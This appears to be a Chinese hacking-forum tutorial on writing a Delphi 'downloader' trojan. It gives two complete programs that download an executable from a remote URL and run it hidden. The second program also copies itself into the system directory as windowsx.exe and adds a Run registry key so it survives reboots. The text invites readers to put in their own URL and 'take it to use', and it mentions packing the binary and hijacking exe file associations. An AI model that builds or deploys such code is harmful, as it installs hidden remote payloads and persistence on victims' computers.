编写自己的潜入者个人版之基础篇

没有人说编程～小弟就慢慢演示打造一个个人完美版的"潜入者"的方法
先从基础开始～
其他不多说了～那别人的程序改造太累～
自己写～方便
这里写个最简单的"潜入者"
原理如下
下载文件运行～查找函数库
找到两个函数（这次写的下载者就两个函数）
urlmon.pas->UrlDownloadToFile
Windows.pas->Winexec(应该很熟悉吧)
这次我们就用这两个函数搞定任务！

CODE

program Downloader;

uses
Windows,Urlmon;

begin
if URLDownloadToFile(nil, 'http://www.pysky.net/Test.exe', 'Test.exe', 0, nil) = S_OK then winexec('Test.exe',0);
end.

先下载http://www.pysky.net/Test.exe保存到当前目录为Test.exe
然后调用winexec函数运行Test.exe~Winexec后面的参数0=隐藏运行（可以隐藏程序界面）1=标准运行（就是运行了～嘻嘻）
好了把上面的下载地址改成你的就OK了～自己编译一下～就可以拿去用了～
生成文件8.5K用FSG压缩乘4K(潜入者是用MASM写的～葛军不会汇编的～所以不是她写的～)
编写潜入者个人版之二by HEART篇
将讲述如何给基础版下载者添加～系统启动运行和关联exe文件运行(蔬菜的史来姆号称可以传染exe文件其实是就是关联exe文件～没有什么特别的地方！)和如何将自身复制到安全的目录内运行（最安全的地方当然就是～～system目录了～嘻嘻～～）

基础版的生成器我就不写了～等到我讲到～～完美版的时候再作吧～这个例子只要大家了解原理就可以了～当然提供的代码完全可用

---------------------------------------------------------------------------------------------
这个是另外一个朋友叫leun给他写的＂二＂

大概代码如下:

program Downloader;
uses
Windows,
registry;

const
exename ='windowsx.exe';
var

DestFile: string;

function URLDownloadToFile(Caller: cardinal; URL: PChar; FileName: PChar; Reserved: LongWord; StatusCB: cardinal): Longint; stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';

function GetSysDir: String; //得到系统目录
var
Buf: array[0..MAX_PATH] of char;
begin
GetSystemDirectory(Buf, MAX_PATH);
Result := Buf;
if Result[Length(Result)]<>'\' then Result := Result + '\';
end;

procedure reg; //写入注册表启动项
var Reg:Tregistry;
begin
Reg:=Tregistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',False);
Reg.WriteString('down',GetSysDir+exename);
Reg.CloseKey;
Reg.Free;
end;

procedure downexe;
begin
DestFile := GetSysDir() + exename;
UrlDownloadToFile(0,'http://www.163.net/down/xxx.exe',PChar(DestFile),0,0);
WinExec(PChar(DestFile),0);
end;

begin;
reg; //写启动项
downexe; //下载EXE并运行
end.

其中EXE关联不稳定,主要是关联后WINDOWS不能正常关机.我解决不了此问题,哪位dx能将它完成? ... 因为加启动项里面我用了个registry单元,程序增大至80多KB,大啊...
有其它方法加启动项不用registry.程序只有20KB内(不加壳的),暂不列出了,因为上面方法简单,容易看懂,哈哈...